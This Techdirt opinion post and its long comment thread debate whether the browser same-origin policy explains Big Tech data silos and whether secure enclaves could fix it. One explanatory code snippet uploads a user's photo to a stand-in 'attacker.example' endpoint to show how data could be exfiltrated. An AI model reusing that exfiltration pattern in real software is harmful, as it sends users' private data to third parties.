How One 1990s Browser Decision Created Big Tech’s Data Monopolies (And How We Might Finally Fix It)
from the take-back-control dept
There’s a fundamental architectural flaw in how the internet works that most people have never heard of, but it explains nearly every frustration you have with modern technology. Why your photos are trapped in Apple’s ecosystem. Why you can’t easily move data between apps. Why every promising new service starts from scratch, knowing nothing about you. And most importantly, why AI—for all its revolutionary potential—risks making Big Tech even bigger instead of putting powerful tools in your hands.
Former Google and Stripe executive Alex Komoroske (who recently wrote for us about why the future of AI need not be centralized) has written an equally brilliant analysis that traces all of these problems back to something called the “same origin paradigm”—a quick security fix that Netscape’s browser team implemented one night in the 1990s that somehow became the invisible physics governing all modern software.
The same origin paradigm is simple but devastating: Every website and app exists in its own completely isolated universe. Amazon and Google might as well be on different planets as far as your browser is concerned. The Instagram app and the Uber app on your phone can never directly share information. This isolation was meant to keep you safe, but it created something Komoroske calls “the aggregation ratchet”—a system where data naturally flows toward whoever can accumulate the most of it.
This is a much clearer explanation of a problem I identified almost two decades ago—the fundamental absurdity of having to keep uploading the same data to new services, rather than being able to tell a service to access our data at a specific location on the internet. Back then, I argued that the entire point of the open internet shouldn’t be locking up data in private silos, but enabling users to control their data and grant services access to it on their own terms, for their own benefit.
What Komoroske’s analysis reveals is the architectural root cause of why that vision failed. The “promise” of what we optimistically called “the cloud” was that you could more easily connect data and services. The reality became a land grab by internet giants to collect and hold all the data they could. Now we understand why: the same origin paradigm made the centralized approach the path of least resistance.
As Komoroske explains, this architectural choice creates an impossible constraint for system designers.
This creates what I call the iron triangle of modern software. It’s a constraint that binds the hands of system designers—the architects of operating systems and browsers we all depend on. These designers face an impossible choice. They can build systems that support:
- Sensitive data (your emails, photos, documents)
- Network access (ability to communicate with servers)
- Untrusted code (software from developers you don’t know)
But they can only enable two at once—never all three. If untrusted code can both access your sensitive data and communicate over the network, it could steal everything and send it anywhere.
So system designers picked safety through isolation. Each app becomes a fortress—secure but solitary. Want to use a cool new photo organization tool? The browser or operating system forces a stark choice: Either trust it completely with your data (sacrificing the “untrusted” part), or keep your data out of it entirely (sacrificing functionality).
Even when you grant an app or website permission only to look at your photos, you’re not really saying, “You can use my photos for this specific purpose.” You’re saying, “I trust whoever controls this origin, now and forever, to do anything they want with my photos, including sending them anywhere.” It’s an all-or-nothing proposition.
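To make that concrete, here's a hypothetical sketch (none of this is from Komoroske's piece; the endpoint and function names are invented) of why the grant has to be all-or-nothing today: once that cool photo tool's code can read your photos and make network requests, nothing in the origin-based model distinguishes "organize them" from "ship them somewhere else."

```typescript
// Hypothetical: what an origin-scoped grant actually allows. Once the tool's
// script has the photo and general network access, the platform cannot tell
// the legitimate feature apart from exfiltration.
async function onPhotoPicked(input: HTMLInputElement): Promise<void> {
  const photo = input.files?.[0]; // the sensitive data the user handed over
  if (!photo) return;

  await organizeLocally(photo); // the feature the user actually wanted

  // ...but the very same grant also permits this (attacker.example is a
  // made-up endpoint for illustration). The browser won't let this page read
  // the response without CORS, but the photo has already left.
  const form = new FormData();
  form.append("stolen", photo);
  await fetch("https://attacker.example/collect", { method: "POST", body: form });
}

async function organizeLocally(photo: File): Promise<void> {
  // stand-in for the tool's advertised functionality
  console.log(`organizing ${photo.name} (${photo.size} bytes)`);
}
```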
This creates massive friction every time data needs to move between services. But that friction doesn’t just slow things down—it fundamentally reshapes where data accumulates.
Consider how you might plan a trip: You’ve got flights in your email, hotel confirmations in another app, restaurant recommendations in a Google document, your calendar in yet another tool. Every time you need to connect these pieces you have to manually copy, paste, reformat, repeat. So you grant one service (like Google) access to all of this. Suddenly there’s no friction. Everything just works. Later, when it comes time to share your trip details with your fellow travelers, you follow the path of least resistance. It’s simply easier to use the service that already knows your preferences, history, and context.
The service with the most data can provide the most value, which attracts more users, which generates more data. Each click of the ratchet makes it harder for new entrants to compete. The big get bigger not because they’re necessarily better, but because the physics of the system tilts the playing field in their favor.
This isn’t conspiracy or malice. It’s emergent behavior from architectural choices. Water flows downhill. Software with the same origin paradigm aggregates around a few dominant platforms.
Enter artificial intelligence. As Komoroske notes, AI represents something genuinely new: it makes software creation effectively free. We’re entering an era of “infinite software”—endless custom tools tailored to every conceivable need.
AI needs context to be useful. An AI that can see your calendar, email, and documents together might actually help you plan your day. One that only sees fragments is just another chatbot spouting generic advice. But our current security model—with policies attached at the app level—makes sharing context an all-or-nothing gamble.
So what happens? What always happens: The path of least resistance is to put all the data in one place.
Think about what we’re trading away: Instead of the malleable, personal tools that researchers like Geoffrey Litt envision, we get one-size-fits-all assistants that require us to trust megacorporations with our most intimate data. The same physics that turned social media into a few giant platforms is about to do the same thing to AI.
We only accept this bad trade because it’s all we know. It’s an architectural choice made before many of us were born. But it doesn’t have to be this way—not anymore.
But here’s the hopeful part: the technical pieces for a fundamentally different approach are finally emerging. The hopes I had two decades ago, that the cloud could free us from having to let services collect and control all our data, may finally be realized.
Perhaps most interestingly, Komoroske argues that the technological element that makes this possible is the secure enclave now found in many chips. This is a technology many of us worried would lead to the death of general-purpose computers and hand even more power to the large companies. Cory Doctorow has warned about how these systems can be abused—he calls them “demon-haunted computers”—but could we also use that same tech to regain control?
That’s part of Komoroske’s argument:
These secure enclaves can also do something called remote attestation. They can provide cryptographic proof—not just a promise, but mathematical proof—of exactly what software is running inside them. It’s like having a tamper-proof seal that proves the code handling your data is exactly what it claims to be, unmodified and uncompromised.
If you combine these ingredients in just the right way, what this enables, for the first time, are policies attached not to apps but to data itself. Every piece of data could carry its own rules about how it can be used. Your photos might say, “Analyze me locally but never transmit me.” Your calendar might allow, “Extract patterns but only share aggregated insights in a way that is provably anonymous.” Your emails could permit reading but forbid forwarding. This breaks the iron triangle: Untrusted code can now work with sensitive data and have network access, because the policies themselves—not the app’s origin—control what can be done with the data.
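To ground the attestation piece a little (this sketch is mine, not Komoroske's, and every name and field in it is illustrative): a verifier checks a vendor-rooted signature over a report produced inside the enclave, then compares the reported code measurement against the hash of the code it expected to be running. Real schemes such as SGX or TrustZone add endorsement chains, freshness nonces, and revocation on top.

```typescript
import { createHash, verify } from "node:crypto";

// Illustrative shape of an attestation report: a measurement (hash) of the
// code loaded into the enclave, signed by a key rooted in the hardware vendor.
interface AttestationReport {
  codeMeasurement: Buffer;   // hash of the enclave binary, taken by the hardware
  nonce: Buffer;             // freshness value supplied by the verifier
  signature: Buffer;         // vendor-rooted signature over the fields above
}

function verifyAttestation(
  report: AttestationReport,
  vendorPublicKeyPem: string,    // trust anchor published by the chip vendor
  expectedEnclaveBinary: Buffer, // the exact code we expect to be running
  expectedNonce: Buffer,
): boolean {
  // 1. Check the signature: proves the report came from genuine hardware.
  const signedBytes = Buffer.concat([report.codeMeasurement, report.nonce]);
  const signatureOk = verify("sha256", signedBytes, vendorPublicKeyPem, report.signature);
  if (!signatureOk) return false;

  // 2. Check freshness: prevents replaying an old report.
  if (!report.nonce.equals(expectedNonce)) return false;

  // 3. Check the measurement: proves *which* code is running, unmodified.
  const expectedMeasurement = createHash("sha256")
    .update(expectedEnclaveBinary)
    .digest();
  return report.codeMeasurement.equals(expectedMeasurement);
}
```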
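And here is a toy sketch of what "policies attached to data" could look like if an attested runtime, rather than the app's origin, were the thing enforcing them. None of these types or method names are a real API; they are only meant to make the shape of the idea concrete.

```typescript
// Toy model: every piece of data carries its own usage policy, and a trusted
// (attested) runtime refuses operations the policy doesn't allow. All names
// here are hypothetical.
type Operation = "analyze-locally" | "transmit" | "aggregate" | "forward";

interface DataPolicy {
  allowed: Set<Operation>;
}

interface PolicyWrappedData<T> {
  payload: T;
  policy: DataPolicy;
}

class AttestedRuntime {
  // The runtime, not the calling app, decides whether an operation proceeds.
  use<T, R>(
    data: PolicyWrappedData<T>,
    operation: Operation,
    fn: (payload: T) => R,
  ): R {
    if (!data.policy.allowed.has(operation)) {
      throw new Error(`policy forbids "${operation}" on this data`);
    }
    return fn(data.payload);
  }
}

// Example: photos that may be analyzed locally but never transmitted.
const photos: PolicyWrappedData<Uint8Array[]> = {
  payload: [],
  policy: { allowed: new Set<Operation>(["analyze-locally"]) },
};

const runtime = new AttestedRuntime();
runtime.use(photos, "analyze-locally", (p) => p.length); // ok
// runtime.use(photos, "transmit", ...);                  // would throw
```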
Years of recognizing that Cory’s warnings are usually dead-on accurate have me approaching this embrace of secure enclaves with some amount of caution. The same underlying technologies that could liberate users from platform silos could also be used to create more sophisticated forms of control. But Komoroske’s vision represents a genuinely different deployment—using these tools to give users direct control over their own data and to cryptographically limit what systems can do with that data, rather than giving platforms more power to lock things down. The key difference is who controls the policies. (And I’m genuinely curious to hear what Cory thinks of this approach!)
The vision Komoroske paints is compelling: imagine tools that feel like extensions of your will, private by default, adapting to your every need—software that works for you, not on you. A personal research assistant that understands your note-taking system. A financial tracker designed around your specific approach to budgeting. A task manager that reshapes itself around your changing work style.
To the extent that any of this was possible before, it required simply handing over all your data to a big tech firm. The possibility of being able to separate those things… is exciting.
This isn’t just about better apps. It’s about a fundamental shift in the power dynamics of the internet. Instead of being forced to choose between security and functionality, between privacy and convenience, we could have systems where those aren’t trade-offs at all.
The same origin paradigm got us here, creating the conditions for data monopolies and restricting user agency. But as Komoroske argues in both the piece he wrote for us and this new piece, we built these systems—we can build better ones. We might finally deliver on the promise of user empowerment rather than further concentration.
As we’ve argued at Techdirt for years, the internet works best when it empowers users rather than platforms. The same-origin paradigm was an understandable choice given the constraints of the 1990s. But we’re no longer bound by those constraints. The tools now exist to put users back in control of their data and their digital experiences.
We can move past the learned helplessness that has characterized the last decade of internet discourse. We can reject the false choice that says the only way to access powerful new technologies is to surrender our freedoms to tech giants. We can actually build toward a world where end users themselves have both the power and control.
We just need to embrace that opportunity, rather than assuming that the way the internet has worked for the past 30 years is the way it has to run going forward.
Filed Under: aggregation, alex komoroske, control, data, same origin paradigm, secure enclave, silos, trusted computing


Comments on “How One 1990s Browser Decision Created Big Tech’s Data Monopolies (And How We Might Finally Fix It)”
I won’t be reading Komoroske’s article. It is paywalled, which itself is a nice illustration of what’s wrong with the Internet.
The page says “Create a free account to continue reading”.
Riiight. If the account is free, then why not let me read it without an account? So it’s not really free, and you pay for it in another way.
Re:
Huh. Weird. Not for me. And I don’t pay them?
I just looked again, and it asks for an email address, but I clicked the “maybe later” and it went away and I could read the rest of the article.
How odd. I didn’t get that at all.
Re: Re:
Mine was paywalled. I tried creating a free account, but it wanted a credit card for a 15 day trial to view. I declined and left the page. Revisiting the page now (signed in, but without inputting a card), it’s letting me access the full thing.
(FWIW, this was on Firefox with Ublock running. On plain Chrome, the “maybe later” seems to have worked fine. So this may be browser dependent)
Re: Re: Re:
Well, I didn’t have much trouble either, except that the entire page was invisible (among the more than 3,300 total style sheet rules, “application-…” has “html { opacity:0 }” for some reason). Using Reader Mode or just disabling style sheets will fix that.
Archive.org apparently didn’t encounter a paywall either; for anyone who does have trouble, here’s the version it saved.
Re: Re:
FYI, AC is correct. When I visited the page, I was told I had to create a “free” account to continue reading, so although the article is free in that you don’t have to pay money to access it, it is also non-free in that you have to pay with PII instead.
Re: Re: Re:
This. Since even genuine websites may sell data in some countries or be subject to hacking attempts in others, I really have to think long and hard before filling in any form with my details, and I won’t do so just to access one article. Fuck that potentially dangerous shit.
Re: Re: Re:2
There are services such as Mailnesia that can be used for that. It used to be popular to create a “cypherpunks” login, with password “cypherpunks” or “writecode”, but many places no longer allow plain usernames (as opposed to e-mail addresses). Sometimes they insist on “secure” passwords, as if we’re gonna be accessing the Pentagon rather than some site we’ve never heard of before and will probably never think of again.
Even this minimal effort is too much just to see one article we’re vaguely interested in. The internet’s full of easier-to-access stuff we could be reading instead.
Re: Re: Re:
Some paywalls are intentionally “porous”. I suspect that’s, in part, so that some people will read the article and send it to others, without even realizing the company will try to extract money or personal data from those others.
Anyway, the archive.org link should work. (It turns out that “opacity:0” isn’t the only bad style rule—deleting it reveals some text but not the article. But the listed workarounds do work.)
Re: Re: Re:2
I wish. My only access to the Internet is through a library computer that blocks nearly everything, including Wikimedia Commons and archive websites.
Mike, explaining how bad the technical realities of this are is very difficult, so I’ll try to give a brief but decent overview. The very briefest version is: “trusted remote compute is an intractable problem”; there’s no cryptography in the world that can solve it.
I’m sure that you have a decent grounding in cryptography and thus are thinking that can’t be true. After all, we have some really great tech. There are at least two “easy” ways to see this. First: “attestation” in cryptography is (almost) universally a sign that you are using an asymmetric algorithm. This breaks down when someone else has physical control of the hardware: because hardware is designed with operating conditions in mind, there are all kinds of attacks you can do to bypass the crypto. For example, glitch attacks on the power rails. Normally the system will have safeguards against this… but the system is designed to protect against accidents, not a hostile owner (and you should find the idea of a “hostile owner” alarming beyond words for other reasons). The first protections will likely be on the motherboard or power supply, and are thus “easily” modifiable. While there are lots of other physical attacks, I won’t cover all of them. The point is: if you have physical possession of the system, you can modify it (a thing which is only going to get easier… unless we centralize all technology and lock people into silos… what irony).
Additionally: Software bugs are inevitable for any non-trivial project. Even if you ignore the hardware attacks, an attack against your enclave (and it will have an attack surface… though if it’s well written and the enclave tech is good, it will be a relatively small one) AFTER attestation can do major damage as well.
Going even further: How does your enclave software get access to its attestation secret, and how does it prevent people from accessing that secret when it’s outside the enclave? The most common solution I’ve seen enclave tech use is: a centralized authority will sign and encrypt (or delegate the ability to do so) the image, and burn “trusted” keys for that into their SoC. This should also alarm you. Instead of obvious silos, you now have one or a few companies secretly controlling who has access to (or who can give access to) their enclave tech.
The last point I want to bring up: Meltdown and Spectre v1 (which I am hoping you have heard of; if not, look them up) and the whole slew of hardware vulnerabilities that came after make an important point: the complexity of modern hardware makes it nearly impossible to assume there isn’t a hardware-level security vulnerability in your system’s basic, “tried and true” protection mechanisms. If the tools we’ve long been relying on for simple security are so untrustworthy (in modern tech, anyway; if you go read some old SPARCv9 docs, it looks like some of these concerns were not totally unforeseen), how then are we to believe brand-new implementations of new stuff will be reliable anytime soon? (Hint: they won’t.)
Here is an example: https://en.wikipedia.org/wiki/Software_Guard_Extensions
SGX is Intel’s “enclave” tech. And if you read its Wikipedia page, it’s mostly a list of security vulnerabilities.
PS: Do some searches for things like “breaking TrustZone” (and if you don’t know what that is, look up ARM TrustZone)
PPS: Here’s Invisible Things Lab on SGX’s initial announcement: https://theinvisiblethings.blogspot.com/2013/08/thoughts-on-intels-upcoming-software.html which should be good for getting a technical feel for what’s happening with SGX
The idea that smartphone app isolation is a consequence of Netscape’s “same origin” policy is a pretty dubious claim, which the article doesn’t do much to support. I could just as well say it’s the result of early UNIX decisions. Specifically, making a multi-user system where users are protected from each other, but programs running under the same user account have exactly the same privileges. Android co-opted this existing feature, using one user account per app, thereby making them fully isolated. It was there, it was easy, they were in a hurry…
Of course, that UNIX feature can probably be traced back to Multics and elsewhere, and the hypothesis that it caused the isolation is still dubious. The idea of capability-based security also isolates processes, and was already commercialized in 1970 in the Plessey System 250. I could blame Lampson 1973, which starts off “Designers of protection systems are usually pre-occupied with the need to safeguard data from un-authorized access or modification”—but that suggests the idea of “isolation” for security was already ubiquitous. I’m not sure there are viable alternatives even now.
Maybe if the mobile operating systems encouraged developers to use the file system by default, and had easy sharing between apps (such as via the “powerbox” pattern), things would be better. Or maybe not. Plenty of Windows programs did not inter-operate well, even when they had no security barriers between them and Microsoft was trying to make it easy (via OLE, for example). You want to get your financial data from program A into program B? Each can see the other’s files, but good luck.
People still have to care. The users don’t seem to—apparently, many don’t even understand “files”. And the developers could be likened to “the phone company” from a 1976 Saturday Night Live sketch: “We don’t care; we don’t have to.”
Re:
The biggest challenge is simply in getting the data into a format that the receiving program understands. How easily you can transfer incomprehensible data isn’t a useful thing. DEC had the idea decades ago of separating the storage format from the native processing format so that all applications could understand data from other similar applications (Rich Text Format for word-processing documents, for instance). That never went anywhere.
IMO the paper is aiming at the wrong target, and secure enclaves won’t be any sort of solution to data sharing. The main idea behind them is that data in them is supposed to not be available directly to the applications running on the computer, which kind of defeats the purpose of sharing the data in the first place.
Re: Re:
Rich Text Format (RTF) was reasonably common as an “interchange” format in the 1990s—that is, various programs could save and load it despite it not being their native format. Before PDF was common, a Word user might save as RTF to send it to someone who didn’t have Word (which was most people—it cost many hundreds of dollars, whereas WordPad could read RTF and came with Windows).
And if I recall correctly, it was and perhaps still is common as a clipboard format, such as when one would select some text and choose the “Copy” option in Internet Explorer. It could then be pasted into any program that understood RTF, and would retain a decent amount of its formatting.
But whatever format we’re talking about, someone has to write the code to handle it (even if a library does most of the hard work). There’s not much incentive for someone who already has a monopoly to do that. Microsoft implemented RTF back when third-party word processors such as WordPerfect were dominant.
If this is interesting to you, you might want to look into what Apple (and more importantly, ARM) are doing in this area. At least publicly, they seem to be the ones pushing this forward the fastest.
It’s worth noting, there is still some level of trust required (if nothing else, because of physical access to the hardware, potential sideloading attacks, etc).
I don’t want to speak for Cory, but I suspect he’ll still be wary, because it will be possible to make these chips look (via e.g. cryptographic matches, not looking into the data itself) for things like DMCA violations. At the end of the day, you still don’t own the chips, they don’t work for you, and that comes with complications. But it’s potentially a big step closer. And it’s interesting tech, either way.
You should take a really close look at Nostr. It solves this problem.
Correcting Errors
This is incorrect. Web browsers are not the Internet. Human-facing Web sites are extremely popular, of course, but there are many other technologies on the Internet. The same-origin policy is a Web browser concept. Other types of software, such as desktop or mobile apps, are not subject to such limitations. If they were, then Web browsers could not exist, because a Web browser would only be able to talk to the provider of the browser, not Web sites at large.
This is incorrect. Not all software runs in Web browsers. Software that runs elsewhere may or may not be subject to this sort of restriction, and even Web apps can get past the restriction, as the Wikipedia article notes.
This is incorrect. See, for example, Techdirt’s articles on tracking cookies.
This is incorrect. See, for example, Techdirt’s coverage of Meta’s hackery. Or, if you prefer, I have a lot of material on inter-app communication in my books on Android app development.
This is an incorrect definition, with respect to how the rest of both pieces use the term “untrusted code”. Knowing a developer does very little with respect to trust (see the Meta example above). “Untrusted code” refers to not knowing what the code does, not who wrote it.
Re:
Wow, this Techdirt site sounds pretty informative; I’m sure Mike Masnick will be glad you brought it to his attention.
Re:
A usual security-engineering definition of “trusted” is “relied upon to enforce a specified security policy (to a specified extent)”. An operating system kernel is “trusted” in that if it breaks, you’re fucked; for example, a non-root user could read files that the policy says only root should be able to read. It follows that one should want as little trusted code as possible; in other words, the “trusted computing base” should be kept small.
“Untrusted”, then, is everything else. It doesn’t matter who wrote it, whether it or they are trust-worthy, or even whether the user knows what it does.
In the context of a security policy saying “Javascript code pulled from the web can’t delete my private ‘documents’ directory from my laptop”, the Javascript would be untrusted, and the browser would be trusted (by default, because it’d have enough privilege to read and write all my personal files). In the context of “Javascript code run by Alice cannot delete Bob’s documents”, the code and the browser would both be untrusted, because the kernel would be trusted to enforce that.
Re:
This naïve view is even more incorrect. Although you are right to assert that web browsers are not the internet, they are the tool by which the vast majority of people access it, and thus a hard-to-use browser can create an internet that is inaccessible to a non-technologically minded person.
Re: Re:
Are they, though? They certainly were. Now, a lot of people use smartphone apps to access the internet, perhaps more than they use browsers.
As for “vast majority”, I recall reading that smartphones are now the dominant platform for internet access (as opposed to desktop and laptop computers). I don’t know how the statistics for app use and browser use break down across all platforms, but you might be overstating the importance of browsers.
Re: Re: Re:
Taking the Facebook app as an example, that is a mobile device-specific browser that accesses only Facebook, so AC is correct.
Re: Re: Re:2
Okay, but that’s taking us back into the minutiae of the 1998 Microsoft trial. Is it a “browser” if it’s perceived by the user as “just” a help viewer, a Facebook app, or whatever? Or is it just the rich text renderer on which a browser would be based? (A “browser” being that plus navigation buttons, bookmarks, and other such things.)
I suppose it probably is implementing the Same-Origin Policy, although several people have noted how this policy is not a very convincing explanation for the behavior being complained about. Until that’s rectified, determining where browser-engine-based apps fit isn’t likely to be productive.
Re: Re: Re:3
Doubling down, always the most accurate sign of a losing argument. Thanks for playing.
I, for one...
welcome our beloved Big Tech overlords and the billionaires that control them.
I really want to believe in this. I yearn to get excited and energized by the prospects this implies. Providing Cory blesses it.
But I’ve been doing too much dating on horrid apps and am now hot stove shy about getting too fired up on chats only to be profoundly disappointed once I’ve left the coffee shop….prove me wrong.
I find this article weird. Sure, the Same Origin paradigm can cause fragmentation… but it’s designed to be applied to situations where you WANT to silo information based on origin of request.
The problem comes when developers blindly roll over the paradigm into situations where it isn’t the best opportunity.
In fact, when I decide what to do with my data, Same Origin is always one of the first considerations I make. As a result, I store my photos on NextCloud that I host myself; any place online that needs access to them, I can grant that access on a photo-by-photo or album-by-album basis.
OAuth also attempts to solve this issue: you select a central authentication authority, and other services can subscribe to it, being granted access only to the data that YOU choose to grant.
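Roughly, an authorization request spells out exactly which slice of data the client is asking for, and the token it gets back is only good for that slice (the URLs and scope names below are made up for the example):

```typescript
// Hypothetical OAuth 2.0 authorization-code flow, showing that access is
// scoped to what the user grants, not "everything at this origin."
const authorizeUrl = new URL("https://auth.example.com/oauth/authorize");
authorizeUrl.search = new URLSearchParams({
  response_type: "code",
  client_id: "photo-printing-service",          // illustrative client
  redirect_uri: "https://prints.example.com/cb",
  scope: "photos.read:album/vacation-2024",     // only this album, read-only
  state: crypto.randomUUID(),                   // CSRF protection
}).toString();

// The user is sent to authorizeUrl, approves (or narrows) the requested
// scope, and the service later exchanges the returned code for a token that
// the resource server will only honor for that scope.
```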
In short, there have always been ways around the problem of misapplied Same Origin, and these days it’s easier than ever to Do Things Right.
The only real problem is that Same Origin is just so much easier for everyone involved; it requires less thought, less effort, and less configuration to get right. So developers AND end users go there first, unless it doesn’t work at all.
Personally, I would never want to spend time on an Internet where Same Origin didn’t exist — where once someone had my PII, EVERYONE had it. Even if you exclude financial transactions, there’s just too much room for identity theft if you don’t start from Same Origin and then loosen access as needed.
Re:
The impression I’m getting is that of a popular-science view, like William Gibson or the writers of any Star Trek incarnation. Like, hey, I saw a recent news story about Intrusion Countermeasures Electronics, black holes, or the Same Origin Policy, and here’s a story constructed around the idea.
But attestation doesn't work that way
So, yes, secure enclaves can attest to what code they contain.
But that’s the problem – it’s the code they contain, usually as an aggregate binary, not as a list of separate capabilities.
At some point, you have to trust that whoever published the package actually wrote it with only the capabilities they claim. If they lie, you don’t have any way to tell; the only thing you can validate is whether you’re running version X of program Y.
Re:
That’s not necessarily true. In a proper capability system, it’d have only the capabilities it was granted by the user.
It might be hard to make that set as minimal as you’d like; for example, a browser might need permission to talk to your bank and to Google, if the bank relies on some Google-hosted Javascript. That would make it hard for the system to enforce that it can’t send your banking data to Google.
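A toy illustration of the difference (names and hosts are invented): instead of ambient authority to talk to the whole network, the untrusted code only ever receives handles to the specific endpoints it was granted, so “send my banking data to Google” isn’t a call it can even express unless it was handed that capability.

```typescript
// Toy capability style: code gets handles to specific resources, not
// ambient authority.
interface HttpCapability {
  post(path: string, body: string): Promise<void>;
}

// Only the trusted launcher can mint capabilities, each bound to one host.
function makeHttpCapability(host: string): HttpCapability {
  return {
    async post(path, body) {
      await fetch(`https://${host}${path}`, { method: "POST", body });
    },
  };
}

// The untrusted banking widget receives *only* a capability for the bank.
async function bankingWidget(bank: HttpCapability, accountData: string) {
  await bank.post("/sync", accountData);
  // In a real capability system the runtime would also deny this code any
  // ambient network access (no global fetch); here that's a convention of
  // the sketch.
}

const bankCap = makeHttpCapability("bank.example.com");
void bankingWidget(bankCap, "balance: 123");
```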
I see no reason why such a system couldn’t be implemented in an enclave. But it’s easier to promote “trusted computing”—which is the exact opposite of what we should want—than trustworthy computing, which is legitimately hard to do across a whole system. And people fall for it.
Re: Re:
The problem is that any capabilities system is external to the binary, and isn’t truly capable of enforcing the fine-grained permissions listed in the article.
The idea in the article is that, essentially, you are giving Google your banking details; you’ve just set permissions such that they can only do some limited set of operations on it. That’s the part that isn’t really possible to enforce (without trusted third-party assessments).
Re: Re: Re:
At that point, it’s not really a “capability system” in the same sense anymore. With such a system, you could grant your bank permission (or not) to share specified data with Google. What Google’s allowed to do with it afterward is outside the scope of that system, and managed basically as a legal contract.
We can certainly hope for it.
Pretty words but completely unrealistic
I see that several people have already attempted to explain how misguided this article and Komoroske are, a.k.a. wrong.
Those of us who have worked closely with computer security and privacy, particularly with breaking and defeating that very security and privacy, see this as the same kind of nonsense that spawned provably correct code years back.
This whole concept is dependent upon implementing code that follows the rules, but if the rules were always followed we wouldn’t need it in the first place.
I’m reminded of a proposal to allow easier access to restricted data by always keeping the data on the secure server and having an App that only views it on the server. They actually believed they could see the server data without it ever leaving the secure server enclave.
A more current example perhaps is Proton Mail. The idea is that all your mail is encrypted based upon your password that only you have and it’s only decrypted in your client Browser or App. All that is true but the decryption is performed by code they provide. What if it doesn’t follow the rules?
Re:
They’ve released the Proton Mail Bridge as open-source, so I presume the decryption could be checked. The bigger problem is the encryption. Any message that comes from outside of Proton Mail—which for most users would be almost all their messages—has its full text seen by the servers, which then encrypt it. They could save the messages elsewhere, store the symmetric encryption keys, whatever. Hushmail was compromised in exactly this way, to comply with court orders.
That’s not total bullshit. In large part it could be circumvented by someone with a camera, and it’s rare to find a workplace that strictly bans people from carrying those. But it means the viewer might not have all the data; just whatever subset is being viewed at the time, of which audit records can be kept. For example, a bank employee might pull up my records for the last month, and if they click a button they could get more, but if they do that a hundred times it might raise questions. (And there are many cases of implementers fucking this up, with the server sending all kinds of “extra” data but expecting the viewer to not show it.)
Re: Re: That’s not total bullshit.
Two immediate things wrong:
A current example of both of these things has been in the news: the SecDef using Signal. Signal is an extremely secure application, highly recommended. The problem was the quite literal man-in-the-middle on his own device, outside of the secure enclave.
Re: Re: Re:
I have, but I’m not sure what your point is.
“Workplace” was mentioned in that it’s the only realistic way to possibly guard against a camera (but it doesn’t much happen outside military facilities, and in those cases spies can sometimes get past the checks). Someone working from home should just be assumed to have a camera, and access to all encrypted data streams. In which case, a “remote viewer” design pattern might make it easier to only send the data one intends to send; but the server has to guard against “bulk data ripping” somehow.
Re: Re: They’ve released the Proton Mail Bridge as open-source
You are ignoring:
Re: Re: Re:
Probably not too many people, but…
…the type of person who’d check is probably gonna build it themselves, or use a distribution-packaged binary (many of which are now built byte-for-byte reproducibly).
Of course, such a person might recognize that they’d still be fucked if the Proton Mail servers received their messages in plain text and didn’t handle them properly. So maybe they wouldn’t even be using the service.
“it makes software creation effectively free. We’re entering an era of “infinite software”—endless custom tools tailored to every conceivable need.”
No, we are not entering the age of free software. Software has to be written, tested, documented, deployed, maintained. Try to leave out one step and at some point you will have a lot of bad fun.
Hasn’t the idea of infinite interoperability been tried before, in the golden age of XML? This is an idea that cannot ever work.
Re:
Not really. To expect XML to magically produce interoperability is like expecting Unicode to do it. It might help, but has little to do with the hardest problems.
Re: Re: Not really. To expect XML to magically ...
You’ve completely reversed his point: yes, it was foolish for anyone to expect this from XML. That’s what he said!
Another concept that’s been a research project for a long time, and has succeeded in getting many research grants, is Fully Homomorphic Encryption.
Think about that: it can answer your question without ever seeing the question! I’m betting that while they may achieve literal success on some subset of computations, the same techniques will lend themselves to inferring the question, even if a perfect bit-for-bit recovery isn’t possible, else how could it possibly work?
Re: Re: Re:
Techdirt has published articles on how people believing technology to be magic is harmful.
It seems the idea is very attractive.
Re: Re: Re:
I don’t see it as a reversal, but as agreement; a refutation of the hype around XML. “Interoperability” was marketing hype, but not something people really tried in earnest. OOXML is a great example; ostensibly for “interoperability”, but really just the old proprietary formats translated into XML (to fool regulators so they’d stop bothering Microsoft), such that one still has to implement all the legacy crap.
I share your view, but I’ll note that zero-knowledge computations are non-intuitive and can sometimes be surprisingly capable. I don’t see how it could be applied to something like ChatGPT (it’d see which combination of weights are “hit” and could reverse-engineer which data sources were strong influences, right?). But I can’t 100% rule that out.
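For the record, here’s the core trick at toy scale (this is just textbook unpadded RSA’s multiplicative homomorphism, nowhere near full FHE, with throwaway parameters): the server combines ciphertexts it cannot read, and only the key holder sees the result.

```typescript
// Toy partially homomorphic encryption: unpadded RSA is multiplicatively
// homomorphic, i.e. Enc(a) * Enc(b) mod n decrypts to a * b. Real FHE goes
// much further (arbitrary circuits), but the "compute on ciphertext" idea is
// the same. Tiny textbook parameters; never use these for anything real.
const n = 3233n;   // p = 61, q = 53
const e = 17n;
const d = 2753n;   // e * d ≡ 1 (mod lcm(p-1, q-1))

function powMod(base: bigint, exp: bigint, mod: bigint): bigint {
  let result = 1n;
  base %= mod;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
    exp >>= 1n;
  }
  return result;
}

const enc = (m: bigint) => powMod(m, e, n);
const dec = (c: bigint) => powMod(c, d, n);

// Client encrypts its inputs; the server multiplies ciphertexts blindly.
const cA = enc(6n);
const cB = enc(7n);
const cProduct = (cA * cB) % n;  // the server never sees 6 or 7

console.log(dec(cProduct));      // 42n: the client recovers a * b
```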
just wanted to say this discussion was fascinating, even for someone who knows nothing about coding etc.! And quite civil to boot.
whoever was saying recently that there wasn’t enough “tech” left in the “techdirt” clearly was wrong, cuz this discussion gets deep into the “dirt” of “tech”!
🍿🍿🍿🍿🍿
absolute nonsense
this is absolute nonsense, and i don’t really understand how it ended up on Techdirt, since as far as i’m aware Mike is pretty competent when it comes to technology.
the best explanation i can come up with is that the original article (https://every.to/thesis/why-aggregators-ate-the-internet) is trying to use the same origin policy as some sort of journalistic metaphor for data silos, but the way it’s written doesn’t really support that.
or, perhaps, Alex Komoroske is trying to invent the phrase “same origin paradigm” to refer to any kind of security isolation, but since that has almost nothing to do with the same origin policy, i don’t see the connection.
needless to say, the same origin policy is not why mobile apps can’t talk to each other. firstly because mobile apps can communicate with each other, if both apps implement the appropriate Android or iOS protocol to do that. secondly because apps are not websites; sandboxing between apps is a basic security measure, completely unrelated to the same origin policy.
the same origin policy is also not why websites can’t talk to each other. if amazon.com and google.com want to talk to each other, all they need to do is implement a protocol to do that. that could be on the server side, but it can also be done on the client side, as seen in e.g. SAML. the reason they don’t do that is not because of the same origin policy, it’s because they don’t want to.
and even if two websites wanted to communicate with each other using Javascript requests, they can already do that by using a CORS policy (the HTTP Access-Control-Allow-Origin header), so the same origin policy doesn’t even prevent that.
